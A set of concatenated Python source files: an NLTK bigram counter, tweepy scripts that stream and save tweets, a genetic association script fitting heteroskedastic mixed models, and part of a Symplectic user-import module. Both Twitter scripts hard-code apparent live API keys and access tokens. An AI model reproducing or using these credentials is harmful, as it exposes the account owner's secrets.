print fdist.keys()[:20]
print fdist.values()[:20]
## this bit is for printing out the most frequent bigrams
print "\n The most frequent bigrams of words \n"
num_bigrams = 30
bigram_fd = nltk.FreqDist(nltk.bigrams(tokens))
finder = BigramCollocationFinder.from_words(tokens)
scored = finder.score_ngrams(bigram_measures.raw_freq)
# NOTE(review): `interestig_bigrams` (typo) is never used; also this scores a
# BIGRAM finder with trigram_measures.raw_freq -- works, but bigram_measures
# was presumably intended.
interestig_bigrams = sorted(finder.nbest(trigram_measures.raw_freq, num_bigrams))
print sorted(finder.nbest(trigram_measures.raw_freq, num_bigrams))
## this bit will print out a string that can be copy pasted into csv
f = open("graph_input.csv", "wb")
c = csv.writer(f, delimiter=",") ## this is the file that the csv will be written to
for x in xrange(0,num_bigrams):
    new_line = str(bigram_fd.keys()[x]) + "," + str(bigram_fd.values()[x])
    # str.translate(None, chars) is Python 2 only: deletes '.', '(', ')',
    # quote and space characters from the line.
    new_line = new_line.translate(None, '.()\' ')
    c.writerow([new_line])
f.close()
## this bit will add a csv containing info about how often words are used
f = open("node_sizes.csv", "wb")
c = csv.writer(f, delimiter=",") ## this is the file that the csv will be written to
token_freqd = nltk.FreqDist(tokens)
# NOTE(review): raises IndexError if there are fewer than 200 distinct tokens.
for x in xrange(0,200):
    new_line = str(token_freqd.keys()[x]) + "," + str(token_freqd.values()[x])
    new_line = new_line.translate(None, '.()\' ')
    c.writerow([new_line])
f.close()
f.close() | {
"repo_name": "InnoViz/innoviz-frontend",
"path": "app/data miner scripts/MEETUP DESCRIPTIONS/getBigram.py",
"copies": "1",
"size": "4003",
"license": "mit",
"hash": 1509050209851694800,
"line_mean": 36.4205607477,
"line_max": 201,
"alpha_frac": 0.6655008743,
"autogenerated": false,
"ratio": 2.949889462048637,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8938812769213762,
"avg_score": 0.03531551342697515,
"num_lines": 107
} |
# apps.twitter.com/app
# dev.twitter.com/overview/api
# dev.twitter.com/rest/tools/console
import json  # fix: was "import jason" (ImportError)
from os import path
from tweepy import OAuthHandler, Stream, API
from tweepy.streaming import StreamListener  # fix: was "StreaemListener"
from sqlalchemy.orm.exc import NoResultFound  # fix: was "sqlalchmey"
from database.database import session, Tweet, Hashtag, User

# SECURITY NOTE(review): real API credentials are hard-coded below. They
# should be moved to environment variables / a config file and revoked.
Consumer_Key = '8cHXrID1ZvQ6utL8lh8kWHOYJ'
Consumer_Secret = 'nCSeqQtsleaXG4PktUSMOkuXtJT49jydtxIdh3zzJIQLI19cxX'
Access_Token = '464285465-y2Er901orSXkC9YL8nquBr9t82xwOTnSo2oJhERW'
Access_Token_Secret = 'JFHpQdipiGqdarZbkDBWWgKRueINytB8g3THrhVlsiJUY'
auth = OAuthHandler(Consumer_Key, Consumer_Secret)
auth.set_access_token(Access_Token, Access_Token_Secret)
def save_tweets():
    """Sample English tweets from the public stream until interrupted.

    Raw tweet JSON is written to <script dir>/tweets.json through a
    DatabaseListener; Ctrl-C stops sampling and closes the output file.
    """
    directory = _get_dir_absolute_path()
    filepath = path.join(directory, 'tweets.json')  # fix: was 'tweets.jason'
    listener = DatabaseListener(number_tweets_to_save=1000,
                                filepath=filepath)
    stream = Stream(auth, listener)  # fix: was a tuple (Stream.auth, listener)
    languages = ('en',)  # fix: sample() expects an iterable of language codes
    try:
        stream.sample(languages=languages)
    except KeyboardInterrupt:  # fix: was misspelled "KeyboardInterrup"
        listener.file.close()
class DatabaseListener(StreamListener):
    """Stream listener that saves statuses and mirrors raw JSON to a file.

    Fixes over the original: class name ("DatabseListener") and __init__
    parameter ("number_twets_to_save") were misspelled and never matched
    their call sites; the default filename was an unquoted bare name; and
    several statements were syntactically invalid.
    """

    def __init__(self, number_tweets_to_save, filepath=None):
        self._final_count = number_tweets_to_save
        self._current_count = 0
        if filepath is None:
            filepath = 'tweets.txt'  # fix: was a bare name (NameError)
        self.file = open(filepath, 'w')

    # Note: slightly dangerous due to circular reference (original comment).
    def __del__(self):
        self.file.close()  # fix: was "colse()"

    def on_data(self, raw_data):
        # raw_data is a JSON string: parse it, then mirror it to the file.
        data = json.loads(raw_data)  # fix: "jason.load" on a string
        json.dump(raw_data, self.file)
        self.file.write('\n')  # fix: original "''\n)" was a syntax error
        if 'in_reply_to_status_id' in data:
            return self.on_status(data)

    def on_status(self, data):
        # NOTE(review): save_to_databse is defined elsewhere in this module;
        # the spelling matches the original call -- verify the real name.
        save_to_databse(data)
        self._current_count += 1
        print('Status count :{}'.format(self._current_count))  # fix: was format(self,_current_count)
        if self._current_count >= self._final_count:
            return False  # fix: was "Fasle"; returning False stops the stream
| {
"repo_name": "deepak223098/Data_Science_Python",
"path": "save_tweets.py",
"copies": "1",
"size": "2215",
"license": "bsd-3-clause",
"hash": 1407042142139546000,
"line_mean": 33.0769230769,
"line_max": 71,
"alpha_frac": 0.6081264108,
"autogenerated": false,
"ratio": 3.41820987654321,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.452633628734321,
"avg_score": null,
"num_lines": null
} |
# apps.twitter.com/app
# dev.twitter.com/overview/api
# dev.twitter.com/rest/tools/console
import json  # fix: was "import jason" (ImportError)
from tweepy import OAuthHandler, Stream, API
from tweepy.streaming import StreamListener  # fix: was "StreaemListener"

# SECURITY NOTE(review): real API credentials are hard-coded below. They
# should be moved to environment variables / a config file and revoked.
Consumer_Key = '8cHXrID1ZvQ6utL8lh8kWHOYJ'
Consumer_Secret = 'nCSeqQtsleaXG4PktUSMOkuXtJT49jydtxIdh3zzJIQLI19cxX'
Access_Token = '464285465-y2Er901orSXkC9YL8nquBr9t82xwOTnSo2oJhERW'
Access_Token_Secret = 'JFHpQdipiGqdarZbkDBWWgKRueINytB8g3THrhVlsiJUY'
auth = OAuthHandler(Consumer_Key, Consumer_Secret)
auth.set_access_token(Access_Token, Access_Token_Secret)
class PrintListener(StreamListener):  # fix: "Class" keyword and "StreamListerner" typos
    """Listener that prints non-retweet statuses to the terminal."""

    def on_status(self, status):
        # Fix: original compared status.text[:3] (3 chars) to 'RT' (2 chars),
        # which can never be equal, so retweets were never filtered.
        if not status.text[:2] == 'RT':
            print(status.text)
            # Fix: "status.author,screen_name" comma typo and "cource" typo.
            # NOTE(review): assumes tweepy Status exposes .source -- confirm.
            print(status.author.screen_name, status.created_at, status.source, '\n')

    def on_error(self, status_code):
        print("Error Code: {}".format(status_code))
        return True  # Keep Stream alive

    def on_timeout(self):
        print("Listener timed out")
        return True  # Keep Stream alive
def print_to_terminal():
    """Sample the public stream and print English tweets via PrintListener."""
    listener = PrintListener()
    stream = Stream(auth, listener)
    languages = ('en',)  # fix: original "(en',)" was a syntax error
    stream.sample(languages=languages)
def pull_down_tweets(screen_name):
    """Fetch and pretty-print the latest 200 tweets of *screen_name*."""
    api = API(auth)
    tweets = api.user_timeline(screen_name=screen_name, count=200)
    for tweet in tweets:
        print(json.dumps(tweet._json, indent=3))  # fix: "jason" and "ident=" typos
if __name__ =='__main__':
#print_to_terminal()
pull_down_tweets(auth.username)
| {
"repo_name": "deepak223098/Data_Science_Python",
"path": "twitter_data_access.py",
"copies": "1",
"size": "1807",
"license": "bsd-3-clause",
"hash": 2231767341651695900,
"line_mean": 36.6458333333,
"line_max": 96,
"alpha_frac": 0.5733259546,
"autogenerated": false,
"ratio": 3.5155642023346303,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.458889015693463,
"avg_score": null,
"num_lines": null
} |
#!/apps/well/python/2.7.8/bin/python
"""
Usage: hlmm_chr.py
This script fits heteroskedastic linear models or heteroskedastic linear mixed models to a sequence of genetic variants
contained in a .bed file. You need to specify the genotypes.bed file, which also has genotypes.bim and genotypes.fam in
the same directory, along with the start and end indices of segment you want the script to fit models to.
The script runs from start to end-1 inclusive, and the first SNP has index 0.
The script is designed to run on a chromosome segment to facilitate parallel computing on a cluster.
The phenotype file and covariate file formats are the same: FID, IID, Trait1, Trait2, ...
If you specify a random_gts.bed file with the option --random_gts, the script will model random effects for
all of the variants specified in random_gts.bed. If no --random_gts are specified, then heteroskedastic linear
models are used, without random effects. If you add the flag --random_gts_txt, the program assumes that the file
specified for --random_gts is a text file formatted as: FID, IID, x1, x2, ...
Minimally, the script will output a file outprefix.models.gz, which contains a table of the additive
and log-linear variance effects estimated for each variant in the bed file.
If --random_gts are specified, the script will output an estimate of the variance of the random effects
in the null model in outprefix.null_h2.txt. --no_h2_estimate suppresses this output.
If covariates are also specified, it will output estimates of the covariate effects from the null model as
outprefix.null_mean_effects.txt and outprefix.null_variance_effects.txt. --no_covariate_estimates suppresses this output.
"""
from hlmm import hetlm
from hlmm import hetlmm
import argparse
import numpy as np
from pysnptools.snpreader import Bed, Pheno
from scipy.stats import chi2, zscore
####### Output functions ##########
def neglog10pval(x, df):
    """Return -log10 of the chi-square survival p-value P(Chi2_df > x)."""
    # log10(p) = logsf(x, df) * log10(e); negate for the conventional sign.
    log10_e = np.log10(np.e)
    return chi2.logsf(x, df) * -log10_e
def vector_out(alpha, se, digits=4):
    """Format estimates with SEs, t-statistics and -log10 p-values.

    Returns a tab-separated string of (estimate, se, t, -log10 p) fields,
    one quadruple per element; accepts a numpy scalar or 1-D array.
    """
    # t-statistic and its chi-square
    t_stat = alpha / se
    chi_sq = np.square(t_stat)
    if len(alpha.shape) == 0:
        # Scalar case: a single quadruple of fields.
        pval = neglog10pval(chi_sq, 1)
        values = (alpha, se, t_stat, pval)
        return '\t'.join(str(round(v, digits)) for v in values)
    # Vector case: flatten the per-element quadruples into one row.
    fields = []
    for a, s, t, x in zip(alpha, se, t_stat, chi_sq):
        p = neglog10pval(x, 1)
        fields.extend(str(round(v, digits)) for v in (a, s, t, p))
    return '\t'.join(fields)
def id_dict_make(ids):
    """Build a dict mapping each ID row (as a tuple) to its row index.

    ids: 2-D numpy array of IDs (e.g. FID/IID pairs), one row per sample.
    Raises ValueError for non-ndarray input.
    """
    # Fix: isinstance replaces "type(ids)==np.ndarray" so ndarray subclasses
    # are also accepted (strictly more permissive, backward compatible).
    if not isinstance(ids, np.ndarray):
        raise ValueError('Unsupported ID type: should be numpy nd.array')
    return {tuple(ids[i, :]): i for i in range(ids.shape[0])}
def read_covariates(covar_file,ids_to_match,missing):
    """Read a covariate file and reorder its rows to match ids_to_match.

    covar_file: plink-style phenotype/covariate file (FID, IID, c1, c2, ...).
    ids_to_match: 2-D array of (FID, IID) rows defining the target order.
    missing: string marking missing values in the file.
    Returns [X, X_names, pheno_in] where X has an intercept column prepended,
    X_names are the column labels, and pheno_in is a boolean mask over
    ids_to_match marking rows found in the covariate file.
    """
    ## Read a covariate file and reorder to match ids_to_match ##
    # Read covariate file
    covar_f = Pheno(covar_file, missing=missing).read()
    ids = covar_f.iid
    # Get covariate values (column 0 is an all-ones intercept)
    n_X=covar_f._col.shape[0]+1
    X=np.ones((covar_f.val.shape[0],n_X))
    X[:, 1:n_X] = covar_f.val
    # Get covariate names
    # NOTE(review): dtype 'S10' truncates names longer than 10 bytes even
    # though the assignment below converts with 'S20' -- confirm intended.
    X_names = np.zeros((n_X), dtype='S10')
    X_names[0] = 'Intercept'
    X_names[1:n_X] = np.array(covar_f._col, dtype='S20')
    # Remove NAs (any row with at least one missing covariate is dropped)
    NA_rows = np.isnan(X).any(axis=1)
    n_NA_row = np.sum(NA_rows)
    if n_NA_row>0:
        print('Number of rows removed from covariate file due to missing observations: '+str(np.sum(NA_rows)))
        X = X[~NA_rows]
        ids = ids[~NA_rows]
    id_dict = id_dict_make(ids)
    # Match with pheno_ids (viewkeys is Python 2 only)
    ids_to_match_tuples = [tuple(x) for x in ids_to_match]
    common_ids = id_dict.viewkeys() & set(ids_to_match_tuples)
    pheno_in = np.array([(tuple(x) in common_ids) for x in ids_to_match])
    match_ids = ids_to_match[pheno_in,:]
    # Reorder X so its rows line up with the matched subset of ids_to_match.
    X_id_match = np.array([id_dict[tuple(x)] for x in match_ids])
    X = X[X_id_match, :]
    return [X,X_names,pheno_in]
######### Command line arguments #########
if __name__ == '__main__':
parser=argparse.ArgumentParser()
parser.add_argument('genofile',type=str,help='Path to genotypes in BED format')
parser.add_argument('start',type=int,help='Index of SNP in genofile from which to start computing test stats')
parser.add_argument('end',type=int,help='Index of SNP in genofile at which to finish computing test stats')
parser.add_argument('phenofile',type=str,help='Location of the phenotype file')
parser.add_argument('outprefix',type=str,help='Location to output csv file with association statistics')
parser.add_argument('--mean_covar',type=str,help='Location of mean covariate file (default None)',
default=None)
parser.add_argument('--var_covar',type=str,help='Location of variance covariate file (default None)',
default=None)
parser.add_argument('--fit_covariates',action='store_true',
help='Fit covariates for each locus. Default is to fit for null model and project out (mean) and rescale (variance)',
default=False)
parser.add_argument('--random_gts',type=str,help='Location of the BED file with the genotypes of the SNPs that random effects should be modelled for',default=None)
parser.add_argument('--random_gts_txt',action='store_true',default=False,help='Random effect design matrix supplied as text file with columns: FID, IID, x1, x2, ... Overrides assumed .bed formatting')
parser.add_argument('--h2_init',type=float,help='Initial value for variance explained by random effects (default 0.05)',
default=0.05)
parser.add_argument('--phen_index',type=int,help='If the phenotype file contains multiple phenotypes, which phenotype should be analysed (default 1, first)',
default=1)
parser.add_argument('--min_maf',type=float,help='Ignore SNPs with minor allele frequency below min_maf (default 0.05)',default=0.05)
parser.add_argument('--missing_char',type=str,help='Missing value string in phenotype file (default NA)',default='NA')
parser.add_argument('--max_missing',type=float,help='Ignore SNPs with greater percent missing calls than max_missing (default 5)',default=5)
parser.add_argument('--append',action='store_true',default=False,help='Append results to existing output file with given outprefix (default overwrites existing')
parser.add_argument('--whole_chr',action='store_true',default=False,help='Fit models to all variants in .bed genofile')
parser.add_argument('--no_covariate_estimates',action='store_true',default=False,help='Suppress output of covariate effect estimates')
parser.add_argument('--no_h2_estimate',action='store_true',default=False,help='Suppress output of h2 estimate')
args=parser.parse_args()
####################### Read in data #########################
#### Read phenotype ###
pheno = Pheno(args.phenofile, missing=args.missing_char).read()
y = np.array(pheno.val)
pheno_ids = np.array(pheno.iid)
if y.ndim == 1:
pass
elif y.ndim == 2:
y = y[:, args.phen_index - 1]
else:
raise (ValueError('Incorrect dimensions of phenotype array'))
# Remove y NAs
y_not_nan = np.logical_not(np.isnan(y))
if np.sum(y_not_nan) < y.shape[0]:
y = y[y_not_nan]
pheno_ids = pheno_ids[y_not_nan,:]
# Make id dictionary
print('Number of non-missing phenotype observations: ' + str(y.shape[0]))
### Get covariates
## Get mean covariates
if not args.mean_covar == None:
X, X_names, pheno_in = read_covariates(args.mean_covar,pheno_ids, args.missing_char)
n_X = X.shape[1]
# Remove rows with missing values
if np.sum(pheno_in) < y.shape[0]:
y = y[pheno_in]
pheno_ids = pheno_ids[pheno_in,:]
# Normalise non-constant cols
X_stds = np.std(X[:, 1:n_X], axis=0)
X[:, 1:n_X] = zscore(X[:, 1:n_X], axis=0)
else:
X = np.ones((int(y.shape[0]), 1))
n_X = 1
X_names = np.array(['Intercept'])
## Get variance covariates
if not args.var_covar == None:
V, V_names, pheno_in = read_covariates(args.var_covar,pheno_ids, args.missing_char)
n_V = V.shape[1]
# Remove rows with missing values
if np.sum(pheno_in) < y.shape[0]:
y = y[pheno_in]
pheno_ids = pheno_ids[pheno_in,:]
# Normalise non-constant cols
V_stds = np.std(V[:, 1:n_V], axis=0)
V[:, 1:n_V] = zscore(V[:, 1:n_V], axis=0)
else:
V = np.ones((int(y.shape[0]), 1))
n_V = 1
V_names = np.array(['Intercept'])
n_pars = n_X + n_V + 1
print(str(n_pars) + ' parameters in model')
### Read genotypes ###
test_chr = Bed(args.genofile)
# select subset to test
if args.whole_chr:
sid = test_chr.sid
pos = test_chr.pos
test_chr = test_chr.read()
else:
sid = test_chr.sid[args.start:args.end]
pos = test_chr.pos[args.start:args.end]
test_chr = test_chr[:, args.start:args.end].read()
genotypes = test_chr.val
# Get genotype matrix
if genotypes.ndim == 1:
chr_length = 1
genotypes = genotypes.reshape(genotypes.shape[0], 1)
else:
chr_length = genotypes.shape[1]
print('Number of test loci: ' + str(genotypes.shape[1]))
print('Genotypes for '+str(genotypes.shape[0])+' individuals read')
# Get sample ids
geno_id_dict = id_dict_make(np.array(test_chr.iid))
# Intersect with phenotype IDs
ids_in_common = {tuple(x) for x in pheno_ids} & geno_id_dict.viewkeys()
pheno_ids_in_common = np.array([tuple(x) in ids_in_common for x in pheno_ids])
y = y[pheno_ids_in_common]
pheno_ids = pheno_ids[pheno_ids_in_common,:]
pheno_id_dict = id_dict_make(pheno_ids)
X = X[pheno_ids_in_common,:]
V = V[pheno_ids_in_common,:]
geno_id_match = np.array([geno_id_dict[tuple(x)] for x in pheno_ids])
genotypes = genotypes[geno_id_match, :]
# Get sample size
n = genotypes.shape[0]
if n == 0:
raise (ValueError('No non-missing observations with both phenotype and genotype data'))
print(str(n) + ' individuals in genotype file with no missing phenotype or covariate observations')
n = float(n)
#### Read random effect genotypes ####
if args.random_gts is not None:
if args.random_gts_txt:
random_gts_f = Pheno(args.random_gts)
else:
random_gts_f = Bed(args.random_gts)
random_gts_ids = np.array(random_gts_f.iid)
random_gts_f = random_gts_f.read()
# Match to phenotypes
G_random = random_gts_f.val
G = np.empty((genotypes.shape[0], G_random.shape[1]))
G[:] = np.nan
for i in xrange(0, random_gts_ids.shape[0]):
if tuple(random_gts_ids[i, :]) in pheno_id_dict:
G[pheno_id_dict[tuple(random_gts_ids[i, :])], :] = G_random[i, :]
del G_random
# Check for NAs
random_isnan = np.isnan(G)
random_gts_NAs = np.sum(random_isnan, axis=0)
gts_with_obs = list()
if np.sum(random_gts_NAs) > 0:
print('Mean imputing missing genotypes in random effect design matrix')
for i in xrange(0, G.shape[1]):
if random_gts_NAs[i] < G.shape[0]:
gts_with_obs.append(i)
if random_gts_NAs[i] > 0:
gt_mean = np.mean(G[np.logical_not(random_isnan[:, i]), i])
G[random_isnan[:, i], i] = gt_mean
# Keep only columns with observations
if len(gts_with_obs) < G.shape[1]:
G = G[:, gts_with_obs]
G = zscore(G, axis=0)
# Rescale random effect design matrix
G = np.power(G.shape[1], -0.5) * G
print(str(int(G.shape[1])) + ' loci in random effect')
else:
G = None
######### Initialise output files #######
## Output file
if args.append:
write_mode='ab'
else:
write_mode='wb'
outfile=open(args.outprefix+'.models.gz',write_mode)
if not args.append:
header='SNP\tn\tfrequency\tlikelihood\tadd\tadd_se\tadd_t\tadd_pval\tvar\tvar_se\tvar_t\tvar_pval\tav_pval\n'
outfile.write(header)
######### Fit Null Model ##########
## Get initial guesses for null model
print('Fitting Null Model')
# Optimize null model
null_optim= hetlm.model(y, X, V).optimize_model()
## Record fitting of null model
# Get print out for fixed mean effects
alpha_out=np.zeros((n_X,2))
alpha_out[:,0]=null_optim['alpha']
alpha_out[:,1]=null_optim['alpha_se']
# Rescale
if n_X>1:
for i in xrange(0,2):
alpha_out[1:n_X,i] = alpha_out[1:n_X,i]/X_stds
if not args.append and not args.no_covariate_estimates and args.mean_covar is not None:
np.savetxt(args.outprefix + '.null_mean_effects.txt',
np.hstack((X_names.reshape((n_X, 1)), np.array(alpha_out, dtype='S20'))),
delimiter='\t', fmt='%s')
# variance effects
beta_out=np.zeros((n_V,2))
beta_out[0:n_V,0]=null_optim['beta']
beta_out[0:n_V,1]=null_optim['beta_se']
# Rescale
if n_V>1:
for i in xrange(0,2):
beta_out[1:n_X,i] = beta_out[1:n_X,i]/V_stds
if not args.append and not args.no_covariate_estimates and args.var_covar is not None:
np.savetxt(args.outprefix + '.null_variance_effects.txt',
np.hstack((V_names.reshape((n_V, 1)), np.array(beta_out, dtype='S20'))),
delimiter='\t', fmt='%s')
### Project out mean covariates and rescale if not fitting for each locus
if not args.fit_covariates:
# Residual y
y=y-X.dot(null_optim['alpha'])
# Reformulate fixed_effects
X=np.ones((int(n),1))
n_X=1
# Rescaled residual y
D_null_sqrt=np.exp(0.5*V.dot(null_optim['beta']))
y=y/D_null_sqrt
# Reformulate fixed variance effects
V=np.ones((int(n),1))
n_V=1
# Initialise h2
if G is not None:
if args.no_h2_estimate:
h2_init = args.h2_init
else:
print('Estimating h2 in null model')
null_optim = hetlmm.model(y, X, V, G).optimize_model(args.h2_init)
h2_init = null_optim['h2']
# Save null h2 estimate
if not args.append:
np.savetxt(args.outprefix + '.null_h2.txt',
np.array([null_optim['h2'], null_optim['h2_se']], dtype='S20'),
delimiter='\t', fmt='%s')
############### Loop through loci and fit AV models ######################
print('Fitting models for specified loci')
for loc in xrange(0,chr_length):
# Filler for output if locus doesn't pass thresholds
additive_av_out='NaN\tNaN\tNaN\tNaN'
variance_out='NaN\tNaN\tNaN\tNaN'
likelihood=np.nan
allele_frq=np.nan
av_pval=np.nan
# Get test genotypes
test_gts=genotypes[:,loc]
# Find missingness and allele freq
test_gt_not_na=np.logical_not(np.isnan(test_gts))
n_l=np.sum(test_gt_not_na)
missingness = 100.0 * (1 - float(n_l) / n)
if missingness<args.max_missing:
test_gts=test_gts[test_gt_not_na]
test_gts = test_gts.reshape((test_gts.shape[0], 1))
allele_frq=np.mean(test_gts)/2
# Mean normalise genotype vector
test_gts = test_gts - 2*allele_frq
if allele_frq>0.5:
allele_frq=1-allele_frq
if allele_frq>args.min_maf:
# Remove missing data rows
y_l=y[test_gt_not_na]
X_l=X[test_gt_not_na,:]
V_l=V[test_gt_not_na,:]
# Add test locus genotypes to mean and variance fixed effect design matrices
X_l=np.hstack((X_l,test_gts))
V_l=np.hstack((V_l,test_gts))
# Record standard deviation of test gt
print('Fitting AV model for locus '+str(loc))
if G is not None:
G_l = G[test_gt_not_na, :]
av_optim = hetlmm.model(y_l, X_l, V_l, G_l).optimize_model(h2_init)
h2_init = av_optim['h2']
else:
av_optim= hetlm.model(y_l, X_l, V_l).optimize_model()
# Check convergence success
if av_optim['success']:
# Likelihood
likelihood=av_optim['likelihood']
# Mean effect of locus
additive_av_out=vector_out(av_optim['alpha'][n_X],av_optim['alpha_se'][n_X],6)
# Variance effect of locus
variance_out=vector_out(av_optim['beta'][n_V],av_optim['beta_se'][n_V],6)
av_pval=neglog10pval((av_optim['alpha'][n_X]/av_optim['alpha_se'][n_X])**2+(av_optim['beta'][n_V]/av_optim['beta_se'][n_V])**2,2)
else:
print('Maximisation of likelihood failed for for '+sid[loc])
outfile.write(sid[loc] + '\t'+str(n_l)+'\t'+ str(allele_frq)+'\t'+str(likelihood)+'\t'+additive_av_out+'\t'+variance_out+'\t'+str(round(av_pval,6))+'\n')
outfile.close() | {
"repo_name": "AlexTISYoung/hlmm",
"path": "bin/hlmm_chr.py",
"copies": "1",
"size": "17791",
"license": "mit",
"hash": -4963762059286151000,
"line_mean": 45.5759162304,
"line_max": 204,
"alpha_frac": 0.6055308864,
"autogenerated": false,
"ratio": 3.1741302408563783,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.921510735431807,
"avg_score": 0.012910754587661668,
"num_lines": 382
} |
#app = symplectic
from datetime import datetime
import os
import urllib
import urllib2
from xml.etree.ElementTree import (
    ElementTree, Element, SubElement, XML, ParseError
)
from xml.parsers.expat import ExpatError

from publications.models import (
    Publication, BibliographicRecord, BiblioURL, Authored
)
# Symplectic API endpoint and the XML namespace its documents use
SYMPLECTIC_API_URL = 'http://medic3.cardiff.ac.uk:8090/publications-api/v3.4/'
SYMPLECTIC_XMLNS_URI = 'http://www.symplectic.co.uk/publications/api'
SYMPLECTIC_NAMESPACE = '{' + SYMPLECTIC_XMLNS_URI + '}'
# Local scratch folders where XML files exchanged with the API are written
SYMPLECTIC_LOCAL_XML_FOLDER = '/tmp/symplectic/'
SYMPLECTIC_LOCAL_AUTH_FOLDER = 'userpubs/'
SYMPLECTIC_LOCAL_PUBS_FOLDER = 'pubs/'
SYMPLECTIC_LOCAL_PUBSMODIFIED_FOLDER = 'pubsmodified/'
SYMPLECTIC_LOCAL_USER_FOLDER = 'usersadmin/'
SYMPLECTIC_LOCAL_USER_IMPORTFILE = 'import_users.xml'
SYMPLECTIC_LOCAL_USER_CLEARFILE = 'clear_users.xml'
# LDAP authority name and feed id expected by the Symplectic user import
AUTHENTICATING_AUTHORITY = 'CARDIFFLDAP'
IMPORT_USERS_FEED_ID = 'django arkestra'
# Timestamp captured once at import time; used to name generated XML files
TIMESTAMP = str(datetime.now())
class User(object):
    """Plain data holder describing one Symplectic user record.

    Attributes mirror the XML fields sent to the Symplectic
    import-users API; all default to the empty string.
    """
    def __init__(self):
        self.title = ''
        self.initials = ''
        self.first_name = ''
        self.last_name = ''
        self.known_as = ''
        self.suffix = ''
        self.email = ''
        self.authenticating_authority = ''
        self.username = ''
        self.proprietary_id = ''
        # NOTE(review): looks like a typo for "send_users"; kept for
        # backward compatibility with any external readers.
        self.send_usersr = ''
        self.is_academic = ''
        # Initialised here so _create_xml_users_file can always read it,
        # even if a caller forgets to assign a group descriptor
        # (previously it was only set externally).
        self.primary_group_descriptor = ''
        self.generic_field_1_dept = ''
        self.generic_field_2_dept_id = ''
        self.generic_field_11_irg = ''
        self.generic_field_12_irg_id = ''
        self.generic_field_13_admin = ''
        self.generic_field_14_institute = ''
        self.generic_field_15_institute_id = ''
# functions for creating users
def clear_users():
    """Ask the Symplectic API to clear all users.

    Builds the clear-users XML request file, POSTs it to the API and
    returns the number of users the API reports as cleared.
    """
    xml_path = __createXMLFileForClear()
    api_response = __postClearUsersXMLFileToSymplectic(xml_path)
    return _get_cleared_user_count(api_response)
def send_users(researcher_list):
    """Create Symplectic users for the given researchers.

    Converts the researchers to User objects, writes the import XML
    file, POSTs it to the Symplectic API and returns the number of
    users the API reports as created.
    """
    user_objects = _create_symplectic_user_list(researcher_list)
    xml_path = _create_xml_users_file(user_objects)
    api_response = _post_xml_users_file(xml_path)
    return _get_created_user_count(api_response)
def __createXMLFileForClear():
# Builds an XML File to ask Symplectic to clear all users
clear_root = Element(
'clear-users-request',
{'xmlns': SYMPLECTIC_XMLNS_URI}
)
# Feed
SubElement(clear_root, 'feed-id').text = IMPORT_USERS_FEED_ID
#Convert to ElementTree and write xml version to file
xml_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_USER_FOLDER,
TIMESTAMP,
SYMPLECTIC_LOCAL_USER_CLEARFILE
])
ElementTree(clear_root).write(xml_filename)
print "clearing with", xml_filename
return xml_filename
def __postClearUsersXMLFileToSymplectic(xml_filename):
    """HTTP POST the clear-users XML file to the Symplectic API.

    Returns the body of the API response.
    Raises ESymplecticPostFileError if the POST fails.
    """
    url = SYMPLECTIC_API_URL + 'clear-users'
    headers = {'Content-Type': 'text/xml'}
    # 'with' guarantees the file handle is closed even on error
    # (the original left it open).
    with open(xml_filename, 'r') as xml_file:
        data = xml_file.read()
    req = urllib2.Request(url, data, headers)
    # POST the HTTP request to Symplectic API
    try:
        response = urllib2.urlopen(req)
        return response.read()
    except urllib2.URLError:
        raise ESymplecticPostFileError("""
           Could not HTTP POST the CLEAR Users XML file to Symplectic API
           """)
def _get_cleared_user_count(xml_string):
# Extracts the count from the symplectic response to the XML file clear
try:
response_element = XML(xml_string)
cleared_count = response_element.attrib.get("count")
return cleared_count
except ExpatError:
raise ESymplecticParseFileError("""
Could not extract the number of Users cleared from the XML file
returned by Symplectic API
""")
def _get_created_user_count(xml_string):
"""
Extracts the count from the symplectic response to the XML file of Users
we sent it
"""
try:
response_element = XML(xml_string)
created_count = response_element.attrib.get("count")
return created_count
except ExpatError:
raise ESymplecticParseFileError("""
Could not extract the number of Users created from the XML file
returned by Symplectic API
""")
def _determine_institute(researcher):
    """Return the Institute entity for a researcher, or None if absent.

    Looks for a membership of entity 5 with importance_to_person 5 in
    researcher.person.member_of.
    """
    memberships = researcher.person.member_of.filter(
        entity__in=[5],
        importance_to_person=5
    )
    try:
        first_membership = memberships[0]
    except IndexError:
        # No qualifying membership: the researcher has no institute
        return None
    return first_membership.entity
def _post_xml_users_file(xml_filename):
    """HTTP POST the import-users XML file to the Symplectic API.

    Returns the body of the API response.
    Raises ESymplecticPostFileError if the POST fails.
    """
    # prepare the HTTP request with the XML file of Users as the payload
    url = SYMPLECTIC_API_URL + 'import-users'
    headers = {'Content-Type': 'text/xml'}
    # 'with' guarantees the file handle is closed even on error
    # (the original left it open).
    with open(xml_filename, 'r') as xml_file:
        data = xml_file.read()
    req = urllib2.Request(url, data, headers)
    # POST the HTTP request to Symplectic API
    try:
        response = urllib2.urlopen(req)
        return response.read()
    except (urllib2.URLError,):
        raise ESymplecticPostFileError(
            "Could not HTTP POST the CREATE Users XML file to Symplectic API"
        )
def _create_xml_users_file(user_objectlist):
# Builds an XML File of Users we want to ask Symplectic to create, in
# the format that Symplectic`s API is expecting. XML elements are
# created for each user in the list of User
# objects passed in
users_root = Element(
'import-users-request',
{'xmlns': SYMPLECTIC_XMLNS_URI}
)
# Feed
SubElement(users_root, 'feed-id').text = IMPORT_USERS_FEED_ID
# List of users(plural) - will contain user(singular) elements
users_plural_element = SubElement(users_root, 'users')
for user_object in user_objectlist:
# Add individual user(singular) sub-element
user_element = SubElement(users_plural_element, 'user')
# Add details
SubElement(user_element, 'title').text = user_object.title
SubElement(user_element, 'initials').text = user_object.initials
SubElement(user_element, 'first-name').text = user_object.first_name
SubElement(user_element, 'last-name').text = user_object.last_name
SubElement(user_element, 'known-as').text = '' # user_object.known_as
SubElement(user_element, 'suffix').text = '' # user_object.suffix
SubElement(user_element, 'email').text = user_object.email
SubElement(
user_element,
'authenticating-authority'
).text = user_object.authenticating_authority
SubElement(user_element, 'username').text = user_object.username
SubElement(
user_element,
'proprietary-id').text = user_object.proprietary_id
SubElement(
user_element,
'primary-group-descriptor'
).text = user_object.primary_group_descriptor
if user_object.is_academic is True:
SubElement(user_element, 'is-academic').text = 'true'
